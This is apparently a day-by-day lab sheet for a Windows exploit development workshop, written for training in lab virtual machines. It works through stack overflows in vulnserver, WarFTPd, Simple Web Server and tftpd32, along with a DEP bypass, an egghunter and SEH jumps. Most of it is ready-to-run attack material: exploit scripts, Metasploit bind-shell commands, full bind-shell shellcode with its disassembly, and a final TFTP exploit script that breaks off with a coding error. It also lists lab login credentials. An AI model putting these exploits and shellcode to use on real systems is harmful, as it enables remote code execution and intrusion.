joemccray

San Diego Exploit Development 2018

Nov 14th, 2017
Whitepapers of interest:
https://www.sans.org/reading-room/whitepapers/firewalls/tactical-data-diodes-industrial-automation-control-systems-36057


#######################
# VMs for this course #
#######################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
username: workshop
password: password

https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts

You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).

#######################################################
# Files you may find helpful for learning Exploit Dev #
#######################################################
https://s3.amazonaws.com/secureninja/files/slides.zip
https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
-----------------------------------------------------------------------

- In the new command prompt window where you ran nc, type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option "Edit with Notepad++"

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note which command it crashed on and the number of As that were sent.

- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note which command it crashed on and the number of As that were sent.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 non-repeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP is overwritten with 396F4338. Read as little-endian bytes, that is 8 (38), C (43), o (6F), 9 (39).
- So we search for 8Co9 in the string of non-repeating chars and count the distance to it.

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP (6250AF11) inside essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it on your Ubuntu host via SCP, or copy it and paste the code into the host.

---------------------------Type This-----------------------------------

cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb (paste the code into this file)

cd ~/toolz/metasploit

./msfconsole

use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST CHANGEME-TO-YOUR-WIN7-IP
set RPORT 9999
exploit

-----------------------------------------------------------------------------------
Day 1 Homework:
Watch the following videos and take notes for questions tomorrow.

http://www.securitytube.net/video/1389
http://www.securitytube.net/video/1398
http://www.securitytube.net/video/1399


-----------------------------------------------------------------------------------------------------------------------

#########
# Day 2 #
#########
You can download the Secure Ninja courseware here:
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx

Morning challenge:
Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple-script format used yesterday with vulnserver.

Day 2 Homework:
Watch the following videos and take notes for questions tomorrow.
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


-----------------------------------------------------------------------------------------------------------------------


#########
# Day 3 #
#########
You can download the Secure Ninja courseware here:
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx

Morning challenge:
Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple-script format used with vulnserver and SLMail, on your Windows 7 host machine.

NOTE: If you did the SLMail exploit on Windows XP yesterday, then please do it on Windows 7 today before doing the Easy File Sharing Web Server 7.2 exploit.

Day 3 Homework:
Watch the following videos and take notes for questions tomorrow.
https://s3.amazonaws.com/secureninja/videos/0006-Intro-to-Mona.mp4
https://s3.amazonaws.com/secureninja/videos/0007-Mona-continued.mp4
https://s3.amazonaws.com/secureninja/videos/0014-DEP-Basics.mp4
https://s3.amazonaws.com/secureninja/videos/0015-Bypassing-DEP-using-ROP-chains.mp4


#########
# Day 4 #
#########
You can download the Secure Ninja courseware here:
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx

Morning challenge:
Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple-script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2, on your Windows 7 host machine.


-------------------------------------------------------------------
All of the content

You can download the Exploit Dev VMs from the links below:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
user: Administrator
pass: strategicsec

https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec

https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
user: exploitlab
pass: exploitlab


All of the exploit scripts listed below are contained in the following zip file. Please download it to your XP-ED-Attack-Host VM. The password for the zip file is: joemccray

https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip

###########################
# Lab 1a: Stack Overflows #
###########################

#################################
# Start WarFTPd                 #
# Start WinDBG                  #
# Press F6                      #
# Attach to war-ftpd.exe        #
#################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a

python warftpd1.py | nc XPSP3-ED-Target-IP 21
-----------------------------------------------------------------------

At the WinDBG prompt, type "r" to show registers (or press Alt+4).

---------------------------Type This-----------------------------------

dd esp
-----------------------------------------------------------------------

---------------------------Type This-----------------------------------

python warftpd2.py | nc XPSP3-ED-Target-IP 21
-----------------------------------------------------------------------

At the WinDBG prompt, type "r" to show registers (or press Alt+4).

---------------------------Type This-----------------------------------

dd esp
-----------------------------------------------------------------------

EIP: 32714131
ESP: affd58 (value at ESP: 71413471)

Now we need to SSH into the StrategicSec Ubuntu host

---------------------------Type This-----------------------------------

cd /home/strategicsec/toolz/metasploit/tools

ruby pattern_offset.rb 32714131
485

ruby pattern_offset.rb 71413471
493
-----------------------------------------------------------------------

Distance to EIP is: 485
Relative position of ESP is: 493

RET – POP EIP
RET 4 – POP EIP and shift ESP down by 4 bytes

---------------------------Type This-----------------------------------

cd /home/strategicsec/toolz/metasploit/
./msfpescan -j ESP DLLs/xpsp3/shell32.dll
-----------------------------------------------------------------------

0x7c9c167d push esp; retn 0x304d
0x7c9d30d7 jmp esp <- how about we use this one
0x7c9d30eb jmp esp
0x7c9d30ff jmp esp


Open warftpd3.py with Notepad++ and fill in the appropriate values:
- Distance to EIP
- Address of JMP ESP

---------------------------Type This-----------------------------------

python warftpd3.py | nc XPSP3-ED-Target-IP 21

0:003> dd eip
0:003> dd esp
-----------------------------------------------------------------------


Notes:
- mention bad characters
- no debugger for this step

---------------------------Type This-----------------------------------

python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------

###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################

Reboot your target host and choose the "2nd" option for DEP.

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b

---------------------------Type This-----------------------------------

python warftpd1.py | nc XPSP3-ED-Target-IP 21

At the WinDBG prompt, type "r" to show registers (or press Alt+4).

dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21

At the WinDBG prompt, type "r" to show registers (or press Alt+4).

dd esp
-----------------------------------------------------------------------

EIP: 32714131
ESP: affd58 (value at ESP: 71413471)

Now we need to SSH into the StrategicSec Ubuntu host

---------------------------Type This-----------------------------------

cd /home/strategicsec/toolz/metasploit/tools

ruby pattern_offset.rb 32714131
485

ruby pattern_offset.rb 71413471
493


cd /home/strategicsec/toolz/metasploit/

./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7


python warftpd3.py | nc XPSP3-ED-Target-IP 21

0:003> dd eip
0:003> dd esp

INT3s - GOOD!!!!!!!


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------


strategicsec....exploit no workie!!!!

Why????????? DEP!!!!!!!!!!!!!


Let's look through ole32.dll for the following instructions:

mov al,0x1
ret 0x4

We need to set AL to 0x1 for the LdrpCheckNXCompatibility routine.

---------------------------Type This-----------------------------------

./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
-----------------------------------------------------------------------

[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e mov al, 1
0x775ee010 ret 4


Then we need to jump to the LdrpCheckNXCompatibility routine in
ntdll.dll that disables DEP.

Inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7

---------------------------Type This-----------------------------------

./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
-----------------------------------------------------------------------

[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24 cmp al, 1
0x7c91cd26 push 2
0x7c91cd28 pop esi
0x7c91cd29 jz 7


This set of instructions makes sure that AL is set to 1; then 2 is pushed
on the stack and popped into ESI.


---------------------------Type This-----------------------------------

dep = "\x0e\xe0\x5e\x77"+\
      "\xff\xff\xff\xff"+\
      "\x24\xcd\x91\x7c"+\
      "\xff\xff\xff\xff"+\
      "A"*0x54


python warftpd5.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------

########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
-----------------------------------------------------------------------

SWS - SIMPLE WEB SERVER
-----------------------

Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82

WinDBG
- attach to "server.exe"

---------------------------Type This-----------------------------------

python sws1.py | nc XPSP3-ED-Target-IP 82


python sws2.py | nc XPSP3-ED-Target-IP 82


SSH into the Ubuntu host (user: strategicsec / pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools
ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229

-----------------------------------------------------------------------
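The pattern_offset.rb lookups above, the 485/493 pair in Lab 1a and the "8Co9" search in 4-count-chars-to-EIP.py all rest on the same cyclic-pattern trick. The script below is an added example written for these notes, not one of the course files: it re-implements pattern_create/pattern_offset in Python 3 and recomputes every offset the notes report, so a crash dump can be triaged without the Metasploit tools at hand. The alphabet, the 3-byte triple layout and the default length are assumptions that mirror the Metasploit scripts.

```python
# Added example for these notes (not from the course files): a Python 3
# re-implementation of the cyclic-pattern trick behind pattern_create.rb /
# pattern_offset.rb, used to recompute the offsets reported in the labs.
# Assumptions: the Metasploit alphabet (A-Z, a-z, 0-9) laid out as 3-byte
# triples, and a crash value copied from a 32-bit little-endian register dump.
import string


def pattern_create(length):
    """Build the non-repeating pattern Aa0Aa1Aa2...Zz9, cut to `length` bytes."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    # 26*26*10*3 = 20280 bytes is the most this alphabet can produce
    return "".join(triples)[:length]


def register_to_chars(hexvalue):
    """Turn a register value as the debugger prints it (e.g. '32714131') into
    the 4 ASCII chars that were actually in memory: x86 is little-endian, so
    0x32714131 was stored as 31 41 71 32, i.e. '1Aq2'."""
    return bytes.fromhex(hexvalue.zfill(8))[::-1].decode("latin-1")


def pattern_offset(hexvalue, length=8192):
    """Offset of the crash value inside the pattern (-1 if not found).
    Like pattern_offset.rb, the big-endian reading is tried as well, so a
    value copied from a byte dump rather than a register still resolves."""
    pattern = pattern_create(length)
    needle = register_to_chars(hexvalue)
    offset = pattern.find(needle)
    if offset < 0:
        offset = pattern.find(needle[::-1])
    return offset


def esp_gap(eip_offset, esp_offset):
    """Bytes between the EIP overwrite and the data ESP points at after the
    crash.  A plain RET leaves ESP 4 bytes past the return address; a RET 4
    (the WarFTPd notes mention it) leaves it 8 bytes past, hence 493 - 485."""
    return esp_offset - eip_offset


# Crash values quoted in these notes, collected here as a lookup table
# (register value -> offset the notes report).
REPORTED = {
    "32714131": 485,   # WarFTPd, value in EIP
    "71413471": 493,   # WarFTPd, value ESP points at
    "41356841": 225,   # Simple Web Server, value in EIP
    "68413668": 229,   # Simple Web Server, value ESP points at
    "396F4338": 2006,  # vulnserver, value in EIP ("8Co9")
}


def verify_reported_offsets():
    """Return {crash value: (offset in notes, recomputed offset)} for each case."""
    return {v: (reported, pattern_offset(v)) for v, reported in REPORTED.items()}


if __name__ == "__main__":
    for value, (reported, computed) in verify_reported_offsets().items():
        status = "ok" if reported == computed else "MISMATCH"
        print("%s -> %r at offset %d (notes say %d) %s"
              % (value, register_to_chars(value), computed, reported, status))
    print("WarFTPd ESP gap: %d bytes" % esp_gap(485, 493))
```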


EGGHUNTER:
----------

"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
         ^^^^^^^^^^^^^^^^
         "\x41\x42\x42\x41" is the tag ABBA

Request layout:

GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP = JMP ESP ]$egghunter HTTP/1.0
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)


-----sws3.py-----
#!/usr/bin/python2

import os # for output setting
import sys
import struct # for pack function

# turn off output buffer and set binary mode
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)


pad = "A" * 225 # distance to EIP
eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll

# egghunter: searches memory for the tag ABBAABBA and jumps to what follows it
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

shellcode = "\xCC" * 700 # placeholder: 700 INT3s stand in for the real payload

buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA" # the egg the hunter looks for, followed by the payload
buf += shellcode
buf += " HTTP/1.0\r\n"

sys.stdout.write(buf)
-----

############################################
# Lab 2b: Not Enough Space (Negative Jump) #
############################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
-----------------------------------------------------------------------

Buffer layout:

[pad = distance_to_seh - len(shellcode)] [shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]

What happens, in order:

1. Overflow the buffer (pad through jmp_min).
2. jmp4: jump over the SEH record.
3. eip (POP POP RET): pop 2 words off the stack.
4. jmp_min: negative jump into the NOPs, then into the shellcode.

#########################################
# Lab 2c: Not Enough Space (Trampoline) #
#########################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
-----------------------------------------------------------------------


On the Strategicsec-XP-ED-Target-VM VM

- open a command prompt
- c:\software\tftpd32
- run tftpd32.exe
- UDP port 69
(socket code is already in the scripts)


On your attack host please install:

NASM - Netwide Assembler


-----------------------------------------------------------------------------------------------------------------

We want to generate the shellcode (BIND SHELL on Port 4444)
- No restricted characters
- Encoder: NONE

Create a Python file called dumpshellcode.py

---
#!/usr/bin/python2

import os
import sys
import struct


# win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

# write the raw bytes so they can be redirected into a file
sys.stdout.write(shellcode)
---



python dumpshellcode.py > bindshell.bin

copy bindshell.bin into the "c:\Program Files\nasm" directory


Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin (317 bytes):
317 bindshell.bin

---------------------------Type This-----------------------------------

C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
-----------------------------------------------------------------------

00000000 FC cld
00000001 6AEB push byte -0x15
00000003 4D dec ebp
00000004 E8F9FFFFFF call dword 0x2
00000009 60 pushad
0000000A 8B6C2424 mov ebp,[esp+0x24]
0000000E 8B453C mov eax,[ebp+0x3c]
00000011 8B7C0578 mov edi,[ebp+eax+0x78]
00000015 01EF add edi,ebp
00000017 8B4F18 mov ecx,[edi+0x18]
0000001A 8B5F20 mov ebx,[edi+0x20]
0000001D 01EB add ebx,ebp
0000001F 49 dec ecx
00000020 8B348B mov esi,[ebx+ecx*4]
00000023 01EE add esi,ebp
00000025 31C0 xor eax,eax
00000027 99 cdq
00000028 AC lodsb
00000029 84C0 test al,al
0000002B 7407 jz 0x34
0000002D C1CA0D ror edx,0xd
00000030 01C2 add edx,eax
00000032 EBF4 jmp short 0x28
00000034 3B542428 cmp edx,[esp+0x28]
00000038 75E5 jnz 0x1f
0000003A 8B5F24 mov ebx,[edi+0x24]
0000003D 01EB add ebx,ebp
0000003F 668B0C4B mov cx,[ebx+ecx*2]
00000043 8B5F1C mov ebx,[edi+0x1c]
00000046 01EB add ebx,ebp
00000048 032C8B add ebp,[ebx+ecx*4]
0000004B 896C241C mov [esp+0x1c],ebp
0000004F 61 popad
00000050 C3 ret
00000051 31DB xor ebx,ebx
00000053 648B4330 mov eax,[fs:ebx+0x30]
00000057 8B400C mov eax,[eax+0xc]
0000005A 8B701C mov esi,[eax+0x1c]
0000005D AD lodsd
0000005E 8B4008 mov eax,[eax+0x8]
00000061 5E pop esi
00000062 688E4E0EEC push dword 0xec0e4e8e
00000067 50 push eax
00000068 FFD6 call esi
0000006A 6653 push bx
0000006C 66683332 push word 0x3233
00000070 687773325F push dword 0x5f327377
00000075 54 push esp
00000076 FFD0 call eax
00000078 68CBEDFC3B push dword 0x3bfcedcb
0000007D 50 push eax
0000007E FFD6 call esi                  PART 1
00000080 5F pop edi
00000081 89E5 mov ebp,esp
00000083 6681ED0802 sub bp,0x208
00000088 55 push ebp
00000089 6A02 push byte +0x2
0000008B FFD0 call eax
0000008D 68D909F5AD push dword 0xadf509d9
00000092 57 push edi
00000093 FFD6 call esi
00000095 53 push ebx
00000096 53 push ebx
--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
00000097 53 push ebx
00000098 53 push ebx
00000099 53 push ebx
0000009A 43 inc ebx
0000009B 53 push ebx
0000009C 43 inc ebx
0000009D 53 push ebx                    PART 2
0000009E FFD0 call eax
000000A0 6668115C push word 0x5c11
000000A4 6653 push bx
000000A6 89E1 mov ecx,esp
000000A8 95 xchg eax,ebp
000000A9 68A41A70C7 push dword 0xc7701aa4
000000AE 57 push edi
000000AF FFD6 call esi
000000B1 6A10 push byte +0x10
000000B3 51 push ecx
000000B4 55 push ebp
000000B5 FFD0 call eax
000000B7 68A4AD2EE9 push dword 0xe92eada4
000000BC 57 push edi
000000BD FFD6 call esi
000000BF 53 push ebx
000000C0 55 push ebp
000000C1 FFD0 call eax
000000C3 68E5498649 push dword 0x498649e5
000000C8 57 push edi
000000C9 FFD6 call esi
000000CB 50 push eax
000000CC 54 push esp
000000CD 54 push esp
000000CE 55 push ebp
000000CF FFD0 call eax
000000D1 93 xchg eax,ebx
000000D2 68E779C679 push dword 0x79c679e7
000000D7 57 push edi
000000D8 FFD6 call esi
000000DA 55 push ebp
000000DB FFD0 call eax
000000DD 666A64 push word 0x64
000000E0 6668636D push word 0x6d63
000000E4 89E5 mov ebp,esp
000000E6 6A50 push byte +0x50
000000E8 59 pop ecx
000000E9 29CC sub esp,ecx
000000EB 89E7 mov edi,esp
000000ED 6A44 push byte +0x44
000000EF 89E2 mov edx,esp
000000F1 31C0 xor eax,eax
000000F3 F3AA rep stosb
000000F5 FE422D inc byte [edx+0x2d]
000000F8 FE422C inc byte [edx+0x2c]
000000FB 93 xchg eax,ebx
000000FC 8D7A38 lea edi,[edx+0x38]
000000FF AB stosd
00000100 AB stosd
00000101 AB stosd
00000102 6872FEB316 push dword 0x16b3fe72
00000107 FF7544 push dword [ebp+0x44]
0000010A FFD6 call esi
0000010C 5B pop ebx
0000010D 57 push edi
0000010E 52 push edx
0000010F 51 push ecx
00000110 51 push ecx
00000111 51 push ecx
00000112 6A01 push byte +0x1
00000114 51 push ecx
00000115 51 push ecx
00000116 55 push ebp
00000117 51 push ecx
00000118 FFD0 call eax
0000011A 68ADD905CE push dword 0xce05d9ad
0000011F 53 push ebx
00000120 FFD6 call esi
00000122 6AFF push byte -0x1
00000124 FF37 push dword [edi]
00000126 FFD0 call eax
00000128 8B57FC mov edx,[edi-0x4]
0000012B 83C464 add esp,byte +0x64
0000012E FFD6 call esi
00000130 52 push edx
00000131 FFD0 call eax
00000133 68F08A045F push dword 0x5f048af0
00000138 53 push ebx
00000139 FFD6 call esi
0000013B FFD0 call eax


part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"


part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"


STACK SHIFTER:
prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
prepend += "\x44" # inc esp


  864. ---- final script ----
  865.  
  866. #!/usr/bin/python2
  867. #TFTP Server remote Buffer Overflow
  868.  
  869. import sys
  870. import socket
  871. import struct
  872.  
  873. if len(sys.argv) < 2:
  874. sys.stderr.write("Usage: tftpd.py <host>\n")
  875. sys.exit(1)
  876.  
  877. target = sys.argv[1]
  878. port = 69
  879.  
  880. eip = 0x7e429353 # jmp esp in USER32.DLL
  881.  
  882. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  883. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  884. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  885. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  886. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  887. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  888. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  889. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  890. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  891. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  892.  
  893. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  894. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  895. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  896. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  897. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  898. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  899. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  900. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  901. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  902. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
